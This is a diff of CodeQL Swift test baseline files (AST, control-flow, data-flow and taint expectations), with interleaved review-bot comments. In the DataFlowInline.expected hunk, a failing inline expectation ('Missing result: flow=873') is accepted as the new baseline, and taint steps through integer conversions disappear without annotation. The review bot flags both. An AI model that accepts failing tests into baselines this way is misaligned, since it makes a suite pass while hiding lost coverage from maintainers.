@@ -1,5 +1,7 @@ | Base | 0 | primary_archetypes.swift:4:1:4:13 | P | | Base | 0 | primary_archetypes.swift:5:1:5:14 | P2 | +| Param | 0 | file://:0:0:0:0 | Copyable | +| Param | 1 | file://:0:0:0:0 | Escapable | | ParamWithProtocols | 0 | file://:0:0:0:0 | Equatable | | ParamWithProtocols | 1 | primary_archetypes.swift:4:1:4:13 | P | | ParamWithSuperclassAndProtocols | 0 | file://:0:0:0:0 | Equatable | diff --git a/swift/ql/test/library-tests/ast/PrintAst.expected b/swift/ql/test/library-tests/ast/PrintAst.expected index 4d12907d3a5..82d866baec9 100644 --- a/swift/ql/test/library-tests/ast/PrintAst.expected +++ b/swift/ql/test/library-tests/ast/PrintAst.expected @@ -3291,6 +3291,7 @@ cfg.swift: # 529| getBase(): [DeclRefExpr] continuation # 529| getMethodRef(): [DeclRefExpr] finish() # 527| getCapture(0): [CapturedDecl] continuation +# 525| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 523| getPattern(0): [NamedPattern] stream # 533| getElement(1): [ForEachStmt] for ... in ... { ... } # 533| getPattern(): [NamedPattern] i @@ -3306,7 +3307,7 @@ cfg.swift: # 533| getBase(): [DeclRefExpr] $i$generator # 533| getBase().getFullyConverted(): [InOutExpr] &... #-----| getMethodRef(): [DeclRefExpr] next() -#-----| getNextCall().getFullyConverted(): [AwaitExpr] await ... +# 533| getNextCall().getFullyConverted(): [AwaitExpr] await ... # 533| getBody(): [BraceStmt] { ... } # 534| getElement(0): [CallExpr] call to print(_:separator:terminator:) # 534| getFunction(): [DeclRefExpr] print(_:separator:terminator:) 
@@ -5137,7 +5138,6 @@ expressions.swift: # 60| getFunction(): [DeclRefExpr] unsafeFunction(pointer:) # 60| getArgument(0): [Argument] pointer: $0 # 60| getExpr(): [DeclRefExpr] $0 -# 60| getExpr().getFullyConverted(): [FunctionConversionExpr] ((UnsafePointer) throws -> ()) ... # 62| [ClassDecl] FailingToInit # 63| getMember(0): [Initializer] FailingToInit.init(x:) # 63| InterfaceType = (FailingToInit.Type) -> (Int) -> FailingToInit? @@ -5972,12 +5972,12 @@ expressions.swift: # 179| getBody(): [BraceStmt] { ... } # 179| getElement(0): [PatternBindingDecl] var ... = ... # 179| getInit(0): [KeyPathExpr] #keyPath(...) -# 179| getRoot(): [TypeRepr] Int? +# 179| getRoot(): [TypeRepr] Optional # 179| getComponent(0): [KeyPathComponent] KeyPathComponent # 179| getComponent(1): [KeyPathComponent] KeyPathComponent # 179| getPattern(0): [NamedPattern] optForce # 179| [ConcreteVarDecl] optForce -# 179| Type = WritableKeyPath +# 179| Type = WritableKeyPath, Int> # 180| [TopLevelCodeDecl] { ... } # 180| getBody(): [BraceStmt] { ... } # 180| getElement(0): [PatternBindingDecl] var ... = ... diff --git a/swift/ql/test/library-tests/controlflow/graph/Cfg.expected b/swift/ql/test/library-tests/controlflow/graph/Cfg.expected index a1c28db69a1..d2d700b9d5c 100644 --- a/swift/ql/test/library-tests/controlflow/graph/Cfg.expected +++ b/swift/ql/test/library-tests/controlflow/graph/Cfg.expected 
@@ -124,10 +124,10 @@ | cfg.swift:40:11:40:11 | "..." | cfg.swift:40:11:40:11 | (Any) ... | | | cfg.swift:40:11:40:11 | (Any) ... | cfg.swift:40:11:40:11 | [...] | | | cfg.swift:40:11:40:11 | OpaqueValueExpr | cfg.swift:40:12:40:12 | .appendLiteral(_:) | | -| cfg.swift:40:11:40:11 | TapExpr | cfg.swift:40:11:40:11 | "..." | | | cfg.swift:40:11:40:11 | Unknown error | cfg.swift:40:12:40:11 | call to appendLiteral(_:) | | | cfg.swift:40:11:40:11 | [...] | cfg.swift:40:10:40:10 | default separator | | | cfg.swift:40:11:40:11 | [...] | cfg.swift:40:11:40:11 | [...] | | +| cfg.swift:40:11:40:34 | TapExpr | cfg.swift:40:11:40:11 | "..." | | | cfg.swift:40:12:40:11 | call to appendLiteral(_:) | cfg.swift:40:27:40:27 | .appendInterpolation(_:) | | | cfg.swift:40:12:40:12 | $interpolation | cfg.swift:40:12:40:12 | &... | | | cfg.swift:40:12:40:12 | &... | cfg.swift:40:11:40:11 | Unknown error | | @@ -141,7 +141,7 @@ | cfg.swift:40:34:40:34 | $interpolation | cfg.swift:40:34:40:34 | &... | | | cfg.swift:40:34:40:34 | &... | cfg.swift:40:34:40:34 | | | | cfg.swift:40:34:40:34 | .appendLiteral(_:) | cfg.swift:40:34:40:34 | $interpolation | | -| cfg.swift:40:34:40:34 | call to appendLiteral(_:) | cfg.swift:40:11:40:11 | TapExpr | | +| cfg.swift:40:34:40:34 | call to appendLiteral(_:) | cfg.swift:40:11:40:34 | TapExpr | | | cfg.swift:42:3:42:10 | return ... | cfg.swift:26:1:43:1 | exit tryCatch(x:) (normal) | return | | cfg.swift:42:10:42:10 | 0 | cfg.swift:42:3:42:10 | return ... | | | cfg.swift:45:1:49:1 | createClosure1(s:) | cfg.swift:45:21:45:25 | s | | 
@@ -899,7 +899,7 @@ | cfg.swift:263:10:263:10 | | cfg.swift:263:11:263:10 | call to appendLiteral(_:) | | | cfg.swift:263:10:263:10 | "..." | cfg.swift:263:3:263:10 | return ... | | | cfg.swift:263:10:263:10 | OpaqueValueExpr | cfg.swift:263:11:263:11 | .appendLiteral(_:) | | -| cfg.swift:263:10:263:10 | TapExpr | cfg.swift:263:10:263:10 | "..." | | +| cfg.swift:263:10:263:79 | TapExpr | cfg.swift:263:10:263:10 | "..." | | | cfg.swift:263:11:263:10 | call to appendLiteral(_:) | cfg.swift:263:12:263:12 | .appendInterpolation(_:) | | | cfg.swift:263:11:263:11 | $interpolation | cfg.swift:263:11:263:11 | &... | | | cfg.swift:263:11:263:11 | &... | cfg.swift:263:10:263:10 | | | @@ -948,7 +948,7 @@ | cfg.swift:263:79:263:79 | $interpolation | cfg.swift:263:79:263:79 | &... | | | cfg.swift:263:79:263:79 | &... | cfg.swift:263:79:263:79 | | | | cfg.swift:263:79:263:79 | .appendLiteral(_:) | cfg.swift:263:79:263:79 | $interpolation | | -| cfg.swift:263:79:263:79 | call to appendLiteral(_:) | cfg.swift:263:10:263:10 | TapExpr | | +| cfg.swift:263:79:263:79 | call to appendLiteral(_:) | cfg.swift:263:10:263:79 | TapExpr | | | cfg.swift:266:1:297:1 | enter testSubscriptExpr() | cfg.swift:266:1:297:1 | testSubscriptExpr() | | | cfg.swift:266:1:297:1 | exit testSubscriptExpr() (normal) | cfg.swift:266:1:297:1 | exit testSubscriptExpr() | | | cfg.swift:266:1:297:1 | testSubscriptExpr() | cfg.swift:267:7:267:7 | a | | 
@@ -2010,9 +2010,10 @@ | cfg.swift:525:13:525:18 | .detached(priority:operation:) | cfg.swift:525:13:525:13 | Task<(), Never>.Type | | | cfg.swift:525:13:530:13 | call to detached(priority:operation:) | cfg.swift:523:78:531:5 | exit { ... } (normal) | | | cfg.swift:525:27:525:27 | default priority | cfg.swift:525:27:530:13 | { ... } | | +| cfg.swift:525:27:530:13 | (@isolated(any) () async -> ()) ... | cfg.swift:525:13:530:13 | call to detached(priority:operation:) | | | cfg.swift:525:27:530:13 | enter { ... } | cfg.swift:525:27:530:13 | { ... } | | | cfg.swift:525:27:530:13 | exit { ... } (normal) | cfg.swift:525:27:530:13 | exit { ... } | | -| cfg.swift:525:27:530:13 | { ... } | cfg.swift:525:13:530:13 | call to detached(priority:operation:) | | +| cfg.swift:525:27:530:13 | { ... } | cfg.swift:525:27:530:13 | (@isolated(any) () async -> ()) ... | | | cfg.swift:525:27:530:13 | { ... } | cfg.swift:526:26:526:26 | $i$generator | | | cfg.swift:526:17:526:17 | $i$generator | cfg.swift:526:17:526:17 | &... | | | cfg.swift:526:17:526:17 | &... | cfg.swift:526:17:526:17 | call to next() | | @@ -2039,7 +2040,8 @@ | cfg.swift:533:5:533:5 | $i$generator | cfg.swift:533:5:533:5 | &... | | | cfg.swift:533:5:533:5 | &... | cfg.swift:533:5:533:5 | call to next() | | | cfg.swift:533:5:533:5 | .next() | cfg.swift:533:5:533:5 | $i$generator | | -| cfg.swift:533:5:533:5 | call to next() | file://:0:0:0:0 | await ... | | +| cfg.swift:533:5:533:5 | await ... | cfg.swift:533:5:535:5 | for ... in ... { ... } | | +| cfg.swift:533:5:533:5 | call to next() | cfg.swift:533:5:533:5 | await ... | | | cfg.swift:533:5:535:5 | for ... in ... { ... } | cfg.swift:522:1:536:1 | exit testAsyncFor() (normal) | empty | | cfg.swift:533:5:535:5 | for ... in ... { ... } | cfg.swift:533:19:533:19 | i | non-empty | | cfg.swift:533:19:533:19 | i | cfg.swift:534:9:534:9 | print(_:separator:terminator:) | match | 
@@ -2252,7 +2254,6 @@ | file://:0:0:0:0 | .x | file://:0:0:0:0 | value | | | file://:0:0:0:0 | .x | file://:0:0:0:0 | value | | | file://:0:0:0:0 | KeyPathComponent | cfg.swift:459:22:459:31 | #keyPath(...) | | -| file://:0:0:0:0 | await ... | cfg.swift:533:5:535:5 | for ... in ... { ... } | | | file://:0:0:0:0 | getter for .b | file://:0:0:0:0 | &... | | | file://:0:0:0:0 | getter for .bs | file://:0:0:0:0 | &... | | | file://:0:0:0:0 | getter for .field | file://:0:0:0:0 | &... | | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index 9bf79af11d9..c45959e061e 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected 
@@ -690,15 +690,9 @@ edges | test.swift:849:19:849:24 | v | test.swift:850:15:850:15 | v | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:859:15:859:15 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:860:15:860:15 | args [Collection element] | provenance | | -| test.swift:856:29:856:40 | args [Collection element] | test.swift:862:16:862:16 | args [Collection element] | provenance | | | test.swift:856:29:856:40 | args [Collection element] | test.swift:867:15:867:15 | args [Collection element] | provenance | | | test.swift:859:15:859:15 | args [Collection element] | test.swift:859:15:859:21 | ...[...] | provenance | | | test.swift:860:15:860:15 | args [Collection element] | test.swift:860:15:860:21 | ...[...] | provenance | | -| test.swift:862:5:862:5 | $arg$generator [Collection element] | test.swift:862:5:862:5 | call to next() [some:0] | provenance | | -| test.swift:862:5:862:5 | call to next() [some:0] | test.swift:862:9:862:9 | arg | provenance | | -| test.swift:862:9:862:9 | arg | test.swift:863:19:863:19 | arg | provenance | | -| test.swift:862:16:862:16 | args [Collection element] | test.swift:862:16:862:16 | call to makeIterator() [Collection element] | provenance | | -| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | test.swift:862:5:862:5 | $arg$generator [Collection element] | provenance | | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | test.swift:866:27:866:29 | KeyPathComponent | provenance | | | test.swift:866:27:866:29 | KeyPathComponent | test.swift:866:21:866:29 | exit #keyPath(...) | provenance | | | test.swift:867:15:867:15 | args [Collection element] | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | provenance | | 
@@ -1478,12 +1472,6 @@ nodes | test.swift:859:15:859:21 | ...[...] | semmle.label | ...[...] | | test.swift:860:15:860:15 | args [Collection element] | semmle.label | args [Collection element] | | test.swift:860:15:860:21 | ...[...] | semmle.label | ...[...] | -| test.swift:862:5:862:5 | $arg$generator [Collection element] | semmle.label | $arg$generator [Collection element] | -| test.swift:862:5:862:5 | call to next() [some:0] | semmle.label | call to next() [some:0] | -| test.swift:862:9:862:9 | arg | semmle.label | arg | -| test.swift:862:16:862:16 | args [Collection element] | semmle.label | args [Collection element] | -| test.swift:862:16:862:16 | call to makeIterator() [Collection element] | semmle.label | call to makeIterator() [Collection element] | -| test.swift:863:19:863:19 | arg | semmle.label | arg | | test.swift:866:21:866:29 | enter #keyPath(...) [Collection element] | semmle.label | enter #keyPath(...) [Collection element] | | test.swift:866:21:866:29 | exit #keyPath(...) | semmle.label | exit #keyPath(...) | | test.swift:866:27:866:29 | KeyPathComponent | semmle.label | KeyPathComponent | 
@@ -1751,7 +1739,6 @@ subpaths | test.swift:850:15:850:15 | v | test.swift:872:18:872:25 | call to source() | test.swift:850:15:850:15 | v | result | | test.swift:859:15:859:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:859:15:859:21 | ...[...] | result | | test.swift:860:15:860:21 | ...[...] | test.swift:873:24:873:31 | call to source() | test.swift:860:15:860:21 | ...[...] | result | -| test.swift:863:19:863:19 | arg | test.swift:873:24:873:31 | call to source() | test.swift:863:19:863:19 | arg | result | | test.swift:867:15:867:38 | \\...[...] | test.swift:873:24:873:31 | call to source() | test.swift:867:15:867:38 | \\...[...] | result | | test.swift:880:19:880:19 | elem | test.swift:877:21:877:28 | call to source() | test.swift:880:19:880:19 | elem | result | | test.swift:884:15:884:31 | ...! | test.swift:877:21:877:28 | call to source() | test.swift:884:15:884:31 | ...! | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected index 48de9172b36..e988711c1de 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlowInline.expected @@ -1,2 +1,3 @@ -failures testFailures +| test.swift:863:24:864:1 | // $ flow=873\n | Missing result: flow=873 | +failures diff --git a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected index 965e47b2d78..06aba1f48bf 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/LocalTaint.expected 
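Review bot: The DataFlowInline.expected hunk accepts a failing inline expectation as the baseline: the new `testFailures` section holds `Missing result: flow=873` for the annotation at test.swift:863, so the suite passes while the flow it asserts is gone. The DataFlow.expected hunks before it (`@@ -690,15 +690,9 @@`, `@@ -1478,12 +1472,6 @@`, `@@ -1751,7 +1739,6 @@`) drop the matching `makeIterator()`/`next()` edges and the `arg` node at 863:19, which suggests the lost flow is the one through iteration over `args`. If the loss is known or intended, the annotation in test.swift would be better changed to `// $ MISSING: flow=873`, which keeps `testFailures` empty and leaves the false negative visible at the test line.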
@@ -17,8 +17,6 @@ | conversions.swift:25:33:25:33 | self | conversions.swift:25:33:25:33 | SSA def(self) | | conversions.swift:26:22:26:22 | SSA def(self) | conversions.swift:26:22:26:38 | self[return] | | conversions.swift:26:22:26:22 | self | conversions.swift:26:22:26:22 | SSA def(self) | -| conversions.swift:33:16:33:26 | call to sourceInt() | conversions.swift:33:12:33:27 | call to Self.init(_:) | -| conversions.swift:34:18:34:28 | call to sourceInt() | conversions.swift:34:12:34:29 | call to Self.init(_:) | | conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | | conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | | conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | @@ -52,11 +50,9 @@ | conversions.swift:57:6:57:6 | SSA def(v5) | conversions.swift:58:12:58:12 | v5 | | conversions.swift:57:6:57:6 | v5 | conversions.swift:57:6:57:6 | SSA def(v5) | | conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | conversions.swift:57:6:57:6 | v5 | -| conversions.swift:57:36:57:46 | call to sourceInt() | conversions.swift:57:11:57:47 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:60:6:60:6 | SSA def(v6) | conversions.swift:61:12:61:12 | v6 | | conversions.swift:60:6:60:6 | v6 | conversions.swift:60:6:60:6 | SSA def(v6) | | conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | conversions.swift:60:6:60:6 | v6 | -| conversions.swift:60:28:60:38 | call to sourceInt() | conversions.swift:60:11:60:39 | call to UInt.init(bitPattern:) | | conversions.swift:63:6:63:6 | SSA def(v7) | conversions.swift:64:12:64:12 | v7 | | conversions.swift:63:6:63:6 | v7 | conversions.swift:63:6:63:6 | SSA def(v7) | | conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:63:6:63:6 | v7 | 
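Review bot: The rows removed from LocalTaint.expected here are taint steps from `call to sourceInt()` into integer conversions (`Self.init(_:)` at conversions.swift:33 and 34, `Self.init(truncatingIfNeeded:)` at 57, `UInt.init(bitPattern:)` at 60), and nothing replaces them. The later conversions.swift hunks in this file and in Taint.expected do the same for `advanced(by:)`, `Self.init(clamping:)`, `UInt8.init(_:)` and `.byteSwapped`, while the `Float.init(_:)` and `String.init(_:)` rows stay. As far as these baselines show, a tainted integer that passes through one of these conversions is no longer tracked, which would be a false negative for any taint query relying on those steps. If this is a known regression and conversions.swift uses inline expectations, the affected lines should carry a `MISSING:` annotation rather than only disappearing from the baseline; whether that file was updated is not visible in this chunk.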
@@ -67,15 +63,9 @@ | conversions.swift:67:12:67:12 | [post] v8 | conversions.swift:68:12:68:12 | v8 | | conversions.swift:67:12:67:12 | v8 | conversions.swift:68:12:68:12 | v8 | | conversions.swift:68:12:68:12 | [post] v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:68:12:68:12 | v8 | conversions.swift:68:12:68:29 | call to advanced(by:) | | conversions.swift:68:12:68:12 | v8 | conversions.swift:69:12:69:12 | v8 | -| conversions.swift:68:28:68:28 | 1 | conversions.swift:68:12:68:29 | call to advanced(by:) | -| conversions.swift:69:12:69:12 | v8 | conversions.swift:69:12:69:39 | call to advanced(by:) | -| conversions.swift:69:28:69:38 | call to sourceInt() | conversions.swift:69:12:69:39 | call to advanced(by:) | | conversions.swift:71:12:71:36 | call to Self.init(exactly:) | conversions.swift:71:12:71:37 | ...! | | conversions.swift:72:12:72:39 | call to Self.init(exactly:) | conversions.swift:72:12:72:40 | ...! | -| conversions.swift:73:26:73:36 | call to sourceInt() | conversions.swift:73:12:73:37 | call to Self.init(clamping:) | -| conversions.swift:74:36:74:46 | call to sourceInt() | conversions.swift:74:12:74:47 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) | conversions.swift:75:12:75:42 | ...! | | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | | conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | 
@@ -112,7 +102,6 @@ | conversions.swift:103:12:103:12 | [post] pair3 | conversions.swift:104:12:104:12 | pair3 | | conversions.swift:103:12:103:12 | pair3 | conversions.swift:104:12:104:12 | pair3 | | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | -| conversions.swift:110:18:110:30 | call to sourceFloat() | conversions.swift:110:12:110:31 | call to UInt8.init(_:) | | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | | conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | @@ -135,8 +124,6 @@ | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | -| conversions.swift:130:12:130:23 | call to sourceUInt() | conversions.swift:130:12:130:25 | .byteSwapped | -| conversions.swift:131:12:131:25 | call to sourceUInt64() | conversions.swift:131:12:131:27 | .byteSwapped | | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | | conversions.swift:138:6:138:6 | SSA def(ms1) | conversions.swift:139:12:139:12 | ms1 | | conversions.swift:138:6:138:6 | ms1 | conversions.swift:138:6:138:6 | SSA def(ms1) | 
@@ -179,8 +166,6 @@ | conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | | conversions.swift:157:12:157:12 | [post] v3 | conversions.swift:158:12:158:12 | v3 | | conversions.swift:157:12:157:12 | v3 | conversions.swift:158:12:158:12 | v3 | -| conversions.swift:165:24:165:24 | myCEnumConst | conversions.swift:165:12:165:36 | call to Self.init(_:) | -| conversions.swift:166:24:166:34 | call to sourceInt() | conversions.swift:166:12:166:35 | call to Self.init(_:) | | conversions.swift:169:7:169:7 | SSA def(self) | conversions.swift:169:7:169:7 | self[return] | | conversions.swift:169:7:169:7 | self | conversions.swift:169:7:169:7 | SSA def(self) | | conversions.swift:170:2:170:2 | SSA def(self) | conversions.swift:170:2:191:2 | self[return] | @@ -243,7 +228,6 @@ | conversions.swift:206:13:206:13 | withUInt | conversions.swift:207:14:207:14 | withUInt | | conversions.swift:207:3:207:22 | SSA def(self) | conversions.swift:208:12:208:12 | self | | conversions.swift:207:10:207:22 | call to Self.init(_:) | conversions.swift:207:3:207:22 | SSA def(self) | -| conversions.swift:207:14:207:14 | withUInt | conversions.swift:207:10:207:22 | call to Self.init(_:) | | conversions.swift:208:12:208:12 | [post] self | conversions.swift:205:2:209:2 | self[return] | | conversions.swift:208:12:208:12 | self | conversions.swift:205:2:209:2 | self[return] | | conversions.swift:211:7:211:20 | SSA def(withMyValue) | conversions.swift:212:13:212:13 | withMyValue | 
@@ -472,8 +456,8 @@ | stringinterpolation.swift:13:3:13:3 | self | stringinterpolation.swift:13:3:13:3 | [post] self | | stringinterpolation.swift:13:23:13:23 | "..." | stringinterpolation.swift:13:3:13:3 | [post] self | | stringinterpolation.swift:13:23:13:23 | SSA def($interpolation) | stringinterpolation.swift:13:24:13:24 | $interpolation | -| stringinterpolation.swift:13:23:13:23 | TapExpr | stringinterpolation.swift:13:23:13:23 | "..." | | stringinterpolation.swift:13:23:13:23 | first is: | stringinterpolation.swift:13:24:13:24 | [post] $interpolation | +| stringinterpolation.swift:13:23:13:47 | TapExpr | stringinterpolation.swift:13:23:13:23 | "..." | | stringinterpolation.swift:13:24:13:24 | $interpolation | stringinterpolation.swift:13:24:13:24 | &... | | stringinterpolation.swift:13:24:13:24 | $interpolation | stringinterpolation.swift:13:24:13:24 | [post] $interpolation | | stringinterpolation.swift:13:24:13:24 | &... | stringinterpolation.swift:13:35:13:35 | $interpolation | @@ -486,7 +470,7 @@ | stringinterpolation.swift:13:47:13:47 | | stringinterpolation.swift:13:47:13:47 | [post] $interpolation | | stringinterpolation.swift:13:47:13:47 | $interpolation | stringinterpolation.swift:13:47:13:47 | &... | | stringinterpolation.swift:13:47:13:47 | $interpolation | stringinterpolation.swift:13:47:13:47 | [post] $interpolation | -| stringinterpolation.swift:13:47:13:47 | &... | stringinterpolation.swift:13:23:13:23 | TapExpr | +| stringinterpolation.swift:13:47:13:47 | &... | stringinterpolation.swift:13:23:13:47 | TapExpr | | stringinterpolation.swift:13:47:13:47 | [post] $interpolation | stringinterpolation.swift:13:47:13:47 | &... | | stringinterpolation.swift:18:6:18:6 | SSA def(p1) | stringinterpolation.swift:19:2:19:2 | p1 | | stringinterpolation.swift:18:6:18:6 | p1 | stringinterpolation.swift:18:6:18:6 | SSA def(p1) | 
@@ -496,8 +480,8 @@ | stringinterpolation.swift:20:2:20:2 | [post] p1 | stringinterpolation.swift:22:21:22:21 | p1 | | stringinterpolation.swift:20:2:20:2 | p1 | stringinterpolation.swift:22:21:22:21 | p1 | | stringinterpolation.swift:22:12:22:12 | SSA def($interpolation) | stringinterpolation.swift:22:13:22:13 | $interpolation | -| stringinterpolation.swift:22:12:22:12 | TapExpr | stringinterpolation.swift:22:12:22:12 | "..." | | stringinterpolation.swift:22:12:22:12 | pair: | stringinterpolation.swift:22:13:22:13 | [post] $interpolation | +| stringinterpolation.swift:22:12:22:30 | TapExpr | stringinterpolation.swift:22:12:22:12 | "..." | | stringinterpolation.swift:22:13:22:13 | $interpolation | stringinterpolation.swift:22:13:22:13 | &... | | stringinterpolation.swift:22:13:22:13 | $interpolation | stringinterpolation.swift:22:13:22:13 | [post] $interpolation | | stringinterpolation.swift:22:13:22:13 | &... | stringinterpolation.swift:22:20:22:20 | $interpolation | 
@@ -512,11 +496,11 @@ | stringinterpolation.swift:22:30:22:30 | | stringinterpolation.swift:22:30:22:30 | [post] $interpolation | | stringinterpolation.swift:22:30:22:30 | $interpolation | stringinterpolation.swift:22:30:22:30 | &... | | stringinterpolation.swift:22:30:22:30 | $interpolation | stringinterpolation.swift:22:30:22:30 | [post] $interpolation | -| stringinterpolation.swift:22:30:22:30 | &... | stringinterpolation.swift:22:12:22:12 | TapExpr | +| stringinterpolation.swift:22:30:22:30 | &... | stringinterpolation.swift:22:12:22:30 | TapExpr | | stringinterpolation.swift:22:30:22:30 | [post] $interpolation | stringinterpolation.swift:22:30:22:30 | &... | | stringinterpolation.swift:23:12:23:12 | SSA def($interpolation) | stringinterpolation.swift:23:13:23:13 | $interpolation | -| stringinterpolation.swift:23:12:23:12 | TapExpr | stringinterpolation.swift:23:12:23:12 | "..." | | stringinterpolation.swift:23:12:23:12 | pair: | stringinterpolation.swift:23:13:23:13 | [post] $interpolation | +| stringinterpolation.swift:23:12:23:31 | TapExpr | stringinterpolation.swift:23:12:23:12 | "..." | | stringinterpolation.swift:23:13:23:13 | $interpolation | stringinterpolation.swift:23:13:23:13 | &... | | stringinterpolation.swift:23:13:23:13 | $interpolation | stringinterpolation.swift:23:13:23:13 | [post] $interpolation | | stringinterpolation.swift:23:13:23:13 | &... | stringinterpolation.swift:23:20:23:20 | $interpolation | 
@@ -531,11 +515,11 @@ | stringinterpolation.swift:23:31:23:31 | | stringinterpolation.swift:23:31:23:31 | [post] $interpolation | | stringinterpolation.swift:23:31:23:31 | $interpolation | stringinterpolation.swift:23:31:23:31 | &... | | stringinterpolation.swift:23:31:23:31 | $interpolation | stringinterpolation.swift:23:31:23:31 | [post] $interpolation | -| stringinterpolation.swift:23:31:23:31 | &... | stringinterpolation.swift:23:12:23:12 | TapExpr | +| stringinterpolation.swift:23:31:23:31 | &... | stringinterpolation.swift:23:12:23:31 | TapExpr | | stringinterpolation.swift:23:31:23:31 | [post] $interpolation | stringinterpolation.swift:23:31:23:31 | &... | | stringinterpolation.swift:24:12:24:12 | SSA def($interpolation) | stringinterpolation.swift:24:13:24:13 | $interpolation | -| stringinterpolation.swift:24:12:24:12 | TapExpr | stringinterpolation.swift:24:12:24:12 | "..." | | stringinterpolation.swift:24:12:24:12 | pair: | stringinterpolation.swift:24:13:24:13 | [post] $interpolation | +| stringinterpolation.swift:24:12:24:24 | TapExpr | stringinterpolation.swift:24:12:24:12 | "..." | | stringinterpolation.swift:24:13:24:13 | $interpolation | stringinterpolation.swift:24:13:24:13 | &... | | stringinterpolation.swift:24:13:24:13 | $interpolation | stringinterpolation.swift:24:13:24:13 | [post] $interpolation | | stringinterpolation.swift:24:13:24:13 | &... | stringinterpolation.swift:24:20:24:20 | $interpolation | 
@@ -548,7 +532,7 @@ | stringinterpolation.swift:24:24:24:24 | | stringinterpolation.swift:24:24:24:24 | [post] $interpolation | | stringinterpolation.swift:24:24:24:24 | $interpolation | stringinterpolation.swift:24:24:24:24 | &... | | stringinterpolation.swift:24:24:24:24 | $interpolation | stringinterpolation.swift:24:24:24:24 | [post] $interpolation | -| stringinterpolation.swift:24:24:24:24 | &... | stringinterpolation.swift:24:12:24:12 | TapExpr | +| stringinterpolation.swift:24:24:24:24 | &... | stringinterpolation.swift:24:12:24:24 | TapExpr | | stringinterpolation.swift:24:24:24:24 | [post] $interpolation | stringinterpolation.swift:24:24:24:24 | &... | | stringinterpolation.swift:26:6:26:6 | SSA def(p2) | stringinterpolation.swift:27:2:27:2 | p2 | | stringinterpolation.swift:26:6:26:6 | p2 | stringinterpolation.swift:26:6:26:6 | SSA def(p2) | @@ -558,8 +542,8 @@ | stringinterpolation.swift:28:2:28:2 | [post] p2 | stringinterpolation.swift:30:21:30:21 | p2 | | stringinterpolation.swift:28:2:28:2 | p2 | stringinterpolation.swift:30:21:30:21 | p2 | | stringinterpolation.swift:30:12:30:12 | SSA def($interpolation) | stringinterpolation.swift:30:13:30:13 | $interpolation | -| stringinterpolation.swift:30:12:30:12 | TapExpr | stringinterpolation.swift:30:12:30:12 | "..." | | stringinterpolation.swift:30:12:30:12 | pair: | stringinterpolation.swift:30:13:30:13 | [post] $interpolation | +| stringinterpolation.swift:30:12:30:30 | TapExpr | stringinterpolation.swift:30:12:30:12 | "..." | | stringinterpolation.swift:30:13:30:13 | $interpolation | stringinterpolation.swift:30:13:30:13 | &... | | stringinterpolation.swift:30:13:30:13 | $interpolation | stringinterpolation.swift:30:13:30:13 | [post] $interpolation | | stringinterpolation.swift:30:13:30:13 | &... | stringinterpolation.swift:30:20:30:20 | $interpolation | 
